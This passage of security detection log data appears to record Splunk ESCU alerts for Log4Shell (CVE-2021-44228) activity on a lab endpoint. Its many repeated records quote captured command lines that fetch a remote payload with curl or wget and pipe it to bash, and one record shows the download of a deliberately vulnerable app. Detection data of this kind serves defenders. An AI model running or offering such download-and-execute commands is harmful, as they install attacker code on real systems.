the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640354, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="PR.DS", annotations._all="T1190", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
